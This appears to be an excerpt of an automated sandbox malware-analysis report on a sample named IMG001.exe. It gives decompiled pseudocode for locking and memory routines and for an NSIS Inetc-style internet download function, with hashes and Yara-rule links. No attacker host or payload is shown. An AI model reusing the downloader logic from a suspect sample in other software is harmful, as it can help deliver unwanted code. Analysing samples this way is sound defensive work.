Instruction Fuzzy Hash: AE01C4B09083449BD300EF5AC18051AFBE5BFC8744F55892EF99993351D7B9D8449B8B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3AC, Relevance: 5.2, APIs: 4, Instructions: 237COMMON

Download Yara Rule

APIs

free.MSVCRT(?,?,?,?,?,00000000,?,?,?,0040F178,?,?,?,0000001C,0040F2CF), ref: 0040D3F5
free.MSVCRT(?,?,?,?,?,00000000,?,?,?,0040F178,?,?,?,0000001C,0040F2CF), ref: 0040D404

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: efaff374e82750f755291a62d2577063b2884f64a35026e073cdcab94c3bf0eb
Instruction ID: 277daacb0d2ae46f3a8c274f78f0d8d381034e4767f5bc719cff96bc5cc619c6
Opcode Fuzzy Hash: efaff374e82750f755291a62d2577063b2884f64a35026e073cdcab94c3bf0eb
Instruction Fuzzy Hash: EF915170E08601CFC710DFA5D88065A77A5EF95384B14887FD84AAB7A1DB38E849CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00412F50, Relevance: 5.1, APIs: 4, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00412F50(void* __ebp, intOrPtr* _a4) {
				intOrPtr _v16;
				intOrPtr _v40;
				void* __edi;
				intOrPtr* _t24;
				signed int _t28;
				signed int _t32;
				signed int* _t35;
				intOrPtr* _t40;
				void* _t44;
				intOrPtr _t49;
				signed int _t50;
				intOrPtr _t51;
				intOrPtr* _t53;

				_t24 = _a4;
				if(_t24 == 0) {
					L5:
					return 0x16;
				} else {
					_t40 =  *_t24;
					if(_t40 == 0) {
						goto L5;
					} else {
						if(_t40 == 0xffffffff) {
							return 0;
						}
						if( *_t40 == 0xc0bab1fd) {
							_t51 = _t40 + 0x14;
							 *_t53 = _t51;
							EnterCriticalSection(??);
							_push(0x16);
							_t28 =  *((intOrPtr*)(_t40 + 0xc));
							__eflags = _t28;
							if(_t28 == 0) {
								_t28 =  *((intOrPtr*)(_t40 + 0x10));
								__eflags =  *((intOrPtr*)(_t40 + 8)) - _t28;
								if(__eflags <= 0) {
									L16:
									 *_t53 = _t51;
									LeaveCriticalSection(??);
									_push(_t28);
									E0040F344(_t44, _t49, __eflags);
									return 0;
								}
								_v40 = _t40 + 0x60;
								 *_t53 = _t40 + 0x48;
								_t32 = E00412B38( *((intOrPtr*)(_t40 + 0x68)), 0xffffffff, 1);
								__eflags = _t32;
								if(__eflags != 0) {
									 *_t53 = _t51;
									_v16 = _t32;
									LeaveCriticalSection(??);
									_push(_t32);
									E0040F344(1, _t49, __eflags);
									return _v16;
								}
								_t35 =  *((intOrPtr*)(_t40 + 0x10));
								_t50 =  *((intOrPtr*)(_t40 + 8));
								__eflags = _t35;
								if(_t35 != 0) {
									_t50 = _t50 - _t35;
									__eflags = _t50;
									 *((intOrPtr*)(_t40 + 0x10)) = 0;
								}
								 *((intOrPtr*)(_t40 + 8)) = 0;
								 *((intOrPtr*)(_t40 + 0xc)) = _t50;
								L10:
								 *_t53 = _t51;
								LeaveCriticalSection(??);
								 *_t53 = _t40 + 0x44;
								_v16 = E00412364( *((intOrPtr*)(_t40 + 0x64)), _t40 + 0x2c, _t50, _t35);
								E0040F344(_t50, _t50, __eflags);
								return _v16;
							}
							_t49 =  *((intOrPtr*)(_t40 + 8));
							__eflags = _t49;
							if(__eflags == 0) {
								goto L16;
							}
							 *((intOrPtr*)(_t40 + 8)) = 0;
							_t35 = _t28 + _t49;
							__eflags = _t35;
							 *((intOrPtr*)(_t40 + 0xc)) = _t35;
							goto L10;
						}
						return 0x16;
					}
				}
			}

0x00412f56
0x00412f5c
0x00412f80
0x00412f8b
0x00412f5e
0x00412f5e
0x00412f62
0x00000000
0x00412f64
0x00412f67
0x00000000
0x00412f8c
0x00412f74
0x00412f90
0x00412f93
0x00412f96
0x00412f9b
0x00412f9c
0x00412f9f
0x00412fa1
0x00412fe8
0x00412feb
0x00412fee
0x00413034
0x00413034
0x00413037
0x0041303c
0x0041303d
0x00000000
0x00413042
0x00412ff6
0x00412ffd
0x0041300a
0x0041300f
0x00413011
0x00413049
0x0041304c
0x00413050
0x00413055
0x00413056
0x00000000
0x0041305b
0x00413013
0x00413016
0x00413019
0x0041301b
0x0041301d
0x0041301d
0x0041301f
0x0041301f
0x00413026
0x0041302d
0x00412fba
0x00412fba
0x00412fbd
0x00412fcc
0x00412fd6
0x00412fda
0x00000000
0x00412fdf
0x00412fa3
0x00412fa6
0x00412fa8
0x00000000
0x00000000
0x00412fae
0x00412fb5
0x00412fb5
0x00412fb7
0x00000000
0x00412fb7
0x00412f7c
0x00412f7c
0x00412f62

APIs

EnterCriticalSection.KERNEL32 ref: 00412F96
LeaveCriticalSection.KERNEL32(00000000), ref: 00412FBD

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 724c6608ae74dec528a37b823c1544e216097ac19c8d7207d2630b344360bb05
Instruction ID: 99748668e0968260eaa5468350bcf833d300245f3f69a25a0aaaf9a85221297f
Opcode Fuzzy Hash: 724c6608ae74dec528a37b823c1544e216097ac19c8d7207d2630b344360bb05
Instruction Fuzzy Hash: C2316D716043018FCB14EF2AC9C069AB7E4AF44314F18856EF814CF34AD778D996DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00413064, Relevance: 5.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00413064(void* __ecx, void* __edi, void* __ebp, intOrPtr* _a4) {
				intOrPtr _v16;
				intOrPtr _v40;
				intOrPtr* _t24;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr* _t41;
				void* _t43;
				intOrPtr _t46;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;

				_t53 = __edi;
				_t43 = __ecx;
				_t24 = _a4;
				if(_t24 == 0) {
					L5:
					return 0x16;
				} else {
					_t41 =  *_t24;
					if(_t41 == 0) {
						goto L5;
					} else {
						if(_t41 == 0xffffffff) {
							return 0;
						}
						if( *_t41 == 0xc0bab1fd) {
							_t54 = _t41 + 0x14;
							 *_t56 = _t54;
							EnterCriticalSection(??);
							_push(_t43);
							_t28 =  *((intOrPtr*)(_t41 + 0xc));
							__eflags = _t28;
							if(_t28 == 0) {
								_t28 =  *((intOrPtr*)(_t41 + 0x10));
								__eflags =  *((intOrPtr*)(_t41 + 8)) - _t28;
								if(__eflags <= 0) {
									L16:
									 *_t56 = _t54;
									LeaveCriticalSection(??);
									_push(_t28);
									E0040F344(_t46, _t53, __eflags);
									return 0;
								}
								_v40 = _t41 + 0x60;
								 *_t56 = _t41 + 0x48;
								_t32 = E00412B38( *((intOrPtr*)(_t41 + 0x68)), 0xffffffff, 1);
								__eflags = _t32;
								if(__eflags != 0) {
									 *_t56 = _t54;
									_v16 = _t32;
									LeaveCriticalSection(??);
									_push(1);
									E0040F344(1, __edi, __eflags);
									return _v16;
								}
								_t50 =  *((intOrPtr*)(_t41 + 0x10));
								_t35 =  *((intOrPtr*)(_t41 + 8));
								__eflags = _t50;
								if(_t50 != 0) {
									_t35 = _t35 - _t50;
									__eflags = _t35;
									 *((intOrPtr*)(_t41 + 0x10)) = 0;
								}
								_t36 = _t35 - 1;
								 *((intOrPtr*)(_t41 + 8)) = _t35 - 1;
								 *((intOrPtr*)(_t41 + 0xc)) = 1;
								L10:
								 *_t56 = _t54;
								LeaveCriticalSection(??);
								 *_t56 = _t41 + 0x44;
								_v16 = E00412364( *((intOrPtr*)(_t41 + 0x64)), _t41 + 0x2c, 1, _t36);
								E0040F344(1, _t53, __eflags);
								return _v16;
							}
							_t46 =  *((intOrPtr*)(_t41 + 8));
							__eflags = _t46;
							if(__eflags == 0) {
								goto L16;
							}
							 *((intOrPtr*)(_t41 + 8)) = _t46 - 1;
							_t36 = _t28 + 1;
							__eflags = _t36;
							 *((intOrPtr*)(_t41 + 0xc)) = _t36;
							goto L10;
						}
						return 0x16;
					}
				}
			}

0x00413064
0x00413064
0x00413069
0x0041306f
0x00413090
0x0041309a
0x00413071
0x00413071
0x00413075
0x00000000
0x00413077
0x0041307a
0x00000000
0x0041309c
0x00413087
0x004130a0
0x004130a3
0x004130a6
0x004130ab
0x004130ac
0x004130af
0x004130b1
0x004130f4
0x004130f7
0x004130fa
0x00413140
0x00413140
0x00413143
0x00413148
0x00413149
0x00000000
0x0041314e
0x00413102
0x00413109
0x00413116
0x0041311b
0x0041311d
0x00413155
0x00413158
0x0041315c
0x00413161
0x00413162
0x00000000
0x00413167
0x0041311f
0x00413122
0x00413125
0x00413127
0x00413129
0x00413129
0x0041312b
0x0041312b
0x00413132
0x00413133
0x00413136
0x004130c6
0x004130c6
0x004130c9
0x004130d8
0x004130e5
0x004130e9
0x00000000
0x004130ee
0x004130b3
0x004130b6
0x004130b8
0x00000000
0x00000000
0x004130bf
0x004130c2
0x004130c2
0x004130c3
0x00000000
0x004130c3
0x0041308e
0x0041308e
0x00413075

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00411F57,00000000), ref: 004130A6
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00411F57,00000000), ref: 004130C9

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: af62fa6a3a6834ef8f0babc4932958c75133af96d67574bd799a9eb31e92e245
Instruction ID: 5716e343702ad496ac84b274ad5ec5a8d5b5540968e02171950b2effbf5db5aa
Opcode Fuzzy Hash: af62fa6a3a6834ef8f0babc4932958c75133af96d67574bd799a9eb31e92e245
Instruction Fuzzy Hash: D83130706043008BCB14EF2AD4C0696BBE4AF48315F18856EEC598F34AD739DAC5CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00412D18, Relevance: 5.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00412D18(void* __edx) {
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t39;
				void* _t44;
				intOrPtr _t51;
				intOrPtr* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr* _t56;

				_t44 = __edx;
				_t52 =  *((intOrPtr*)(_t56 + 0x40));
				_t39 =  *_t52;
				_t51 = _t39 + 0x14;
				 *_t56 = _t51;
				EnterCriticalSection(??);
				_push(_t44);
				_t53 =  *((intOrPtr*)(_t39 + 0xc));
				if(_t53 == 0) {
					_t28 =  *((intOrPtr*)(_t39 + 0x10));
					if(_t28 == 0x3ffffffe) {
						 *((intOrPtr*)(_t39 + 0x10)) = 0x3fffffff;
						_t54 = _t39 + 0x60;
						 *((intOrPtr*)(_t56 + 0x1c)) = _t39 + 0x48;
						 *((intOrPtr*)(_t56 + 4)) = _t54;
						 *_t56 =  *((intOrPtr*)(_t56 + 0x1c));
						_t31 = E00412B38( *((intOrPtr*)(_t39 + 0x68)), 0xffffffff, 1);
						if(_t31 != 0) {
							L12:
							 *_t56 = _t51;
							 *((intOrPtr*)(_t56 + 0x18)) = _t31;
							LeaveCriticalSection(??);
							_push(_t31);
							_t32 =  *((intOrPtr*)(_t56 + 0x18));
							 *((intOrPtr*)( *((intOrPtr*)(_t52 + 8)))) = _t32;
							return _t32;
						}
						 *((intOrPtr*)(_t39 + 8)) =  *((intOrPtr*)(_t39 + 8)) -  *((intOrPtr*)(_t39 + 0x10));
						 *_t56 = _t54;
						_t31 = E00412364( *((intOrPtr*)(_t39 + 0x68)),  *((intOrPtr*)(_t56 + 0x1c)), 1);
						if(_t31 != 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
					} else {
						_t31 = _t28 + 1;
						 *((intOrPtr*)(_t39 + 0x10)) = _t31;
					}
					 *_t56 = _t51;
					LeaveCriticalSection(??);
					_push(_t31);
				} else {
					_t37 = _t53 - 1;
					 *((intOrPtr*)(_t39 + 0xc)) = _t37;
					 *_t56 = _t51;
					LeaveCriticalSection(??);
					_push(_t37);
					if(_t53 == 1) {
						 *_t56 = _t39 + 0x60;
						_t36 = E00412364( *((intOrPtr*)(_t39 + 0x68)), _t39 + 0x48, 1);
						if(_t36 != 0) {
							L4:
							 *((intOrPtr*)( *((intOrPtr*)(_t52 + 8)))) = _t36;
							return _t36;
						}
					}
				}
				 *_t56 =  *((intOrPtr*)(_t52 + 4));
				_t36 = E00410AC0();
				if(_t36 != 0) {
					goto L4;
				}
				return _t36;
			}

0x00412d18
0x00412d1f
0x00412d23
0x00412d25
0x00412d28
0x00412d2b
0x00412d30
0x00412d31
0x00412d36
0x00412d80
0x00412d88
0x00412d9c
0x00412da3
0x00412da9
0x00412db0
0x00412db8
0x00412dc5
0x00412dcc
0x00412df8
0x00412df8
0x00412dfb
0x00412dff
0x00412e04
0x00412e08
0x00412e0c
0x00000000
0x00412e0c
0x00412dd1
0x00412dd7
0x00412de3
0x00412dea
0x00000000
0x00000000
0x00412dec
0x00412d8a
0x00412d8a
0x00412d8b
0x00412d8b
0x00412d8e
0x00412d91
0x00412d96
0x00412d38
0x00412d38
0x00412d3b
0x00412d3e
0x00412d41
0x00412d46
0x00412d48
0x00412d53
0x00412d5b
0x00412d62
0x00412d73
0x00412d76
0x00000000
0x00412d76
0x00412d62
0x00412d48
0x00412d67
0x00412d6a
0x00412d71
0x00000000
0x00000000
0x00412d7f

APIs

EnterCriticalSection.KERNEL32 ref: 00412D2B
LeaveCriticalSection.KERNEL32 ref: 00412D41

Part of subcall function 00412364: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,004130E5,00000000), ref: 00412376
Part of subcall function 00412364: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,004130E5,00000000), ref: 0041239C

LeaveCriticalSection.KERNEL32 ref: 00412D91

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: d4dd007b1d4fd95edeff9e8ba4a768fde927f8ed0c6a290b852c3f211998bc78
Instruction ID: 349865105822010fe847679059a2d44fd51bcc356fb5a962f9fe346aa4bb7b95
Opcode Fuzzy Hash: d4dd007b1d4fd95edeff9e8ba4a768fde927f8ed0c6a290b852c3f211998bc78
Instruction Fuzzy Hash: FE3118701047058FCB14EF2AD1806AAB7E5FF48354F10495EECA4CB346E778E995CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BACC, Relevance: 5.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0040BAEF
free.MSVCRT ref: 0040BB3E
LeaveCriticalSection.KERNEL32 ref: 0040BB4A

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: 8557dcdac74faab736a5d73805c096dfe55cce59f0bb3818a5a5e7b2ff053a20
Instruction ID: 3e742cc53c7fd322ddecd4e99d49773aa135c2b67743067e891f64bad42da69a
Opcode Fuzzy Hash: 8557dcdac74faab736a5d73805c096dfe55cce59f0bb3818a5a5e7b2ff053a20
Instruction Fuzzy Hash: CE0161B5B042028FC710FF64C88152AB7F1EF50344B54867ED94997749E738A984CB8E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9E0, Relevance: 5.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040BBF6,?,?,?,?,?,?,0040B448), ref: 0040B9EC
TlsGetValue.KERNEL32(?,?,?,?,?,0040BBF6,?,?,?,?,?,?,0040B448), ref: 0040BA05
GetLastError.KERNEL32(?,?,?,?,?,?,0040BBF6,?,?,?,?,?,?,0040B448), ref: 0040BA0F
LeaveCriticalSection.KERNEL32(?,?,?,?,?,0040BBF6,?,?,?,?,?,?,0040B448), ref: 0040BA32

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 138d98cf2642ef571cb9c6fbd5c9caa8650c38621339ad72b34d774d634ac117
Instruction ID: db06353c3eaf6b3bd6e640e1e035d92408a35f7498ed5e2156308da7a9bfb933
Opcode Fuzzy Hash: 138d98cf2642ef571cb9c6fbd5c9caa8650c38621339ad72b34d774d634ac117
Instruction Fuzzy Hash: 0FF0B4F1B042014BDB10BFB991C165BBBA09E00344F05413ADD444B306EB38D984CAEE

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: IMG001.exe PID: 5600 Parent PID: 968 IMG001.exeCOMMON

Execution Graph

Execution Coverage:	26.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.9%
Total number of Nodes:	797
Total number of Limit Nodes:	29

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 73811657, Relevance: 131.8, APIs: 63, Strings: 12, Instructions: 583
networkstringmemoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E73811657(struct HWND__* _a4) {
				long _v8;
				void* _v12;
				signed int _v16;
				long _v20;
				CHAR* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				CHAR* _v40;
				long _v44;
				signed int _v48;
				void _v52;
				long _v56;
				void* _v60;
				long _v64;
				CHAR* _v68;
				long _v72;
				intOrPtr _v76;
				long _v80;
				intOrPtr _v84;
				char* _v88;
				long _v92;
				void* _v96;
				struct _SECURITY_ATTRIBUTES* _v100;
				struct _SECURITY_ATTRIBUTES* _v104;
				struct _SECURITY_ATTRIBUTES* _v108;
				void* _v112;
				void* __esi;
				long _t114;
				void* _t115;
				signed int _t122;
				struct HINSTANCE__* _t127;
				void* _t129;
				void* _t133;
				void* _t134;
				long _t139;
				void* _t141;
				long _t146;
				void* _t149;
				void* _t153;
				long _t154;
				intOrPtr _t157;
				void* _t158;
				int _t159;
				int _t163;
				signed int _t164;
				int _t166;
				long _t167;
				int _t170;
				long _t171;
				void* _t174;
				void* _t175;
				CHAR* _t176;
				signed int _t177;
				void* _t183;
				long _t195;
				void* _t209;
				char* _t214;
				int _t232;
				void* _t233;
				void* _t234;
				void* _t236;
				void* _t238;
				CHAR* _t242;
				void* _t247;
				intOrPtr _t248;
				void* _t263;
				intOrPtr _t265;
				intOrPtr _t266;
				intOrPtr _t269;
				void* _t276;
				CHAR* _t280;
				struct HWND__* _t282;
				void* _t283;
				CHAR* _t289;
				void* _t290;
				void* _t291;

				_v16 = _v16 & 0x00000000;
				_push( *0x73818c38);
				_t232 = 0x40;
				_v28 = LocalAlloc(_t232, ??);
				_t280 = LocalAlloc(_t232,  *0x73818c38);
				_v40 = _t280;
				_v32 = LocalAlloc(_t232,  *0x73818c38);
				_t233 = LocalAlloc(_t232,  *0x73818c38);
				_v36 = _t233;
				_t242 = LocalAlloc(0x40,  *0x73818c38);
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v24 = _t242;
				_v96 = _v28;
				_t114 =  *0x73818c38;
				_v76 = _t242;
				_v112 = 0x3c;
				_v92 = _t114;
				_v88 = 0;
				_v84 = _t233;
				_v80 = _t114;
				_v72 = _t114;
				_v68 = _t280;
				_v64 = _t114;
				_v60 = _v32;
				_v56 = _t114;
				_t115 = InternetOpenA("NSIS_Inetc (Mozilla)",  *0x73815ad4,  *0x738157d4, 0, 0); // executed
				_t234 = _t115;
				_v12 = _t234;
				if(_t234 == 0) {
					 *0x73815ab4 = 8;
					goto L87;
				} else {
					_v8 = _v8 & 0x00000000;
					_v20 = 4;
					if(InternetQueryOptionA(_t234, 0x32,  &_v8,  &_v20) != 0 && (_v8 & 0x00000010) != 0) {
						_v48 = _v48 & 0x00000000;
						_v52 = 1;
						InternetSetOptionA(_t234, 0x32,  &_v52, 8);
					}
					if( *0x73815ac4 > 0) {
						_v20 = InternetSetOptionA(_t234, 2, 0x73815ac4, 4);
					}
					if( *0x73815ac8 > 0) {
						InternetSetOptionA(_t234, 6, 0x73815ac8, 4);
					}
					_t127 = LoadLibraryA("wininet.dll");
					if(_t127 != 0) {
						 *0x738156c0 = GetProcAddress(_t127, "FtpCommandA");
					}
					L81:
					while(E73813B5A( *0x738157cc) == 0) {
						_t129 = lstrcmpiA( *0x738157cc, "/end");
						__eflags = _t129;
						if(_t129 == 0) {
							L84:
							InternetCloseHandle(_t234);
							if(lstrcmpiA( *0x738157cc, "/end") == 0) {
								E73813B9E( *0x738157cc);
							}
							L87:
							LocalFree(_v28);
							LocalFree(_t280);
							LocalFree(_v36);
							LocalFree(_v24);
							LocalFree(_v32);
							if(IsWindow(_a4) != 0) {
								PostMessageA(_a4, 0x111, 0xffee0001, 0);
							}
							_t122 =  *0x73815ab4; // 0x4
							return _t122;
						}
						_t133 = E73813B5A(0x738156c8);
						__eflags = _t133;
						if(_t133 != 0) {
							goto L84;
						}
						_t134 = lstrcmpiA( *0x738157cc, "/end");
						__eflags = _t134;
						if(_t134 == 0) {
							goto L84;
						}
						_t289 = _v36;
						 *0x73815ab4 = 1;
						 *_v32 = 0;
						 *_t280 = 0;
						 *_v24 = 0;
						 *_t289 = 0;
						 *_v28 = 0;
						 *0x73815ac0 = 0;
						 *0x73815ab8 = 0; // executed
						PostMessageA(_a4, 0x113, 1, 0); // executed
						__eflags =  *0x73815ab0;
						if( *0x73815ab0 != 0) {
							_t247 = _v16;
							L17:
							__eflags =  *0x73815adf;
							_t139 =  *0x73818c38;
							_v56 = _t139;
							_v64 = _t139;
							_v72 = _t139;
							_v80 = _t139;
							_v92 = _t139;
							if( *0x73815adf != 0) {
								 *0x73815ac0 = GetFileSize(_t247, 0);
							}
							_t141 = InternetCrackUrlA( *0x738157cc, 0, 0,  &_v112);
							__eflags = _t141;
							if(_t141 == 0) {
								 *0x73815ab4 = 0x12;
							} else {
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t214 = _v24;
									__eflags =  *_t214;
									if( *_t214 != 0) {
										wsprintfA(0x73817c30, "%s:%s", _t289, _t214);
										E738113A9(_t247, lstrlenA(0x73817c30), 0x73817c30, 0x73815b30);
										_t291 = _t291 + 0x1c;
										 *0x73817c30 = 0;
									}
								}
								lstrcatA(_t280, _v32);
								 *0x73815ad0 = GetTickCount();
								goto L24;
								do {
									do {
										L24:
										__eflags =  *0x73815adf;
										_t248 = _v100;
										if( *0x73815adf == 0) {
											L26:
											__eflags =  *0x738157e4;
											if( *0x738157e4 == 0) {
												L28:
												_t146 =  *0x73815ab8; // 0x0
												_v20 = _t146;
												_push(0);
												__eflags = _t248 - 1;
												_t148 =  ==  ? 0x8000000 : 0;
												_push( ==  ? 0x8000000 : 0);
												_t149 = 3;
												__eflags = _t248 - 1;
												_t150 =  ==  ? 1 : _t149;
												 *0x73815ab4 = 1;
												__eflags = lstrlenA(_v24);
												_t250 =  >  ? _v24 : 0;
												__eflags = lstrlenA(_t289);
												_t252 =  >  ? _t289 : 0;
												_t153 = InternetConnectA(_t234, _v28, _v88,  >  ? _t289 : 0,  >  ? _v24 : 0,  ==  ? 1 : _t149, ??, ??); // executed
												_t236 = _t153;
												__eflags = _t236;
												if(_t236 == 0) {
													_t238 = 1;
													 *0x73815ab4 = 0xf;
													__eflags = _v100 - 1;
													if(_v100 != 1) {
														L57:
														_t154 = GetLastError();
														_v8 = _t154;
														__eflags = _t154 - 0x2ee3;
														if(_t154 == 0x2ee3) {
															L59:
															__eflags =  *0x73815ad8;
															_t156 =  ==  ? _t238 :  *0x73815ada & 0x000000ff;
															 *0x73815ada =  ==  ? _t238 :  *0x73815ada & 0x000000ff;
															L60:
															__eflags =  *0x73815adf;
															if( *0x73815adf == 0) {
																L62:
																_t157 =  *0x73815ab8; // 0x0
																__eflags = _t157 - _v20;
																if(_t157 <= _v20) {
																	break;
																}
																_t158 =  *0x73815ab4; // 0x4
																__eflags = _t158 - 0xa;
																if(_t158 != 0xa) {
																	L67:
																	__eflags =  *0x73815ada;
																	if( *0x73815ada == 0) {
																		L77:
																		_t234 = _v12;
																		L78:
																		CloseHandle(_v16);
																		__eflags =  *0x73815adf;
																		if( *0x73815adf != 0) {
																			goto L81;
																		}
																		__eflags =  *0x73815ab4;
																		if( *0x73815ab4 == 0) {
																			goto L81;
																		}
																		__eflags =  *0x73815ab0;
																		if( *0x73815ab0 == 0) {
																			_v8 = DeleteFileA(0x738156c8);
																			goto L84;
																		}
																		goto L81;
																	}
																	__eflags = _t158;
																	if(_t158 == 0) {
																		goto L77;
																	}
																	__eflags = _t158 - 3;
																	if(_t158 == 3) {
																		goto L77;
																	}
																	__eflags = _t158 - 0x13;
																	if(_t158 == 0x13) {
																		goto L77;
																	}
																	_t159 = ShowWindow(_a4, 0);
																	__eflags = _t159 - 0xffffffff;
																	if(_t159 == 0xffffffff) {
																		goto L77;
																	}
																	__eflags =  *0x73815828;
																	_t161 =  ==  ? "Inetc plug-in" : 0x73815828;
																	_t163 = MessageBoxA(GetParent(_a4), "Your internet connection seems to be not permitted or dropped out!\nPlease reconnect and click Retry to resume installation.",  ==  ? "Inetc plug-in" : 0x73815828, 0x35);
																	__eflags = _t163 - 4;
																	if(_t163 != 4) {
																		goto L77;
																	}
																	_t164 = 5;
																	__eflags =  *0x73815ad8; // 0x1
																	 *0x73815ab4 = _t164;
																	_t165 =  !=  ? 0 : _t164;
																	_t166 = ShowWindow(_a4,  !=  ? 0 : _t164);
																	__eflags = _t166;
																	if(_t166 != 0) {
																		goto L77;
																	}
																	goto L74;
																}
																_t170 = SleepEx(0x7d0, 0);
																__eflags = _t170;
																if(_t170 != 0) {
																	break;
																}
																goto L65;
															}
															__eflags = _v100 - _t238;
															if(_v100 != _t238) {
																break;
															}
															goto L62;
														}
														__eflags = _t154 - 0x2ee2;
														if(_t154 != 0x2ee2) {
															goto L60;
														}
														goto L59;
													}
													_v8 = 0x800;
													_t174 = InternetGetLastResponseInfoA( &_v44, 0x73817c30,  &_v8);
													__eflags = _t174;
													if(_t174 == 0) {
														goto L57;
													}
													_t175 = E73811065(0x73817c30, "530");
													__eflags = _t175;
													if(_t175 == 0) {
														goto L57;
													}
													_t176 = E73811065(0x73817c30, "530");
													_t177 =  *0x73815ab4; // 0x4
													lstrcpynA((_t177 << 5) + 0x73815000, _t176, 0x20);
													goto L60;
												}
												 *0x73815ab4 = 4;
												_push(_t280);
												__eflags = _v100 - 1;
												if(__eflags != 0) {
													_push(_v100);
													_push(_t236); // executed
													_t183 = E738126FC(_t252, __eflags); // executed
													_t291 = _t291 + 0xc;
												} else {
													_push(_t236);
													_t183 = E73812324(_t252, __eflags);
												}
												__eflags =  *0x73815ab4 - 4;
												_t290 = _t183;
												if( *0x73815ab4 == 4) {
													L35:
													__eflags = _t290;
													if(_t290 == 0) {
														goto L52;
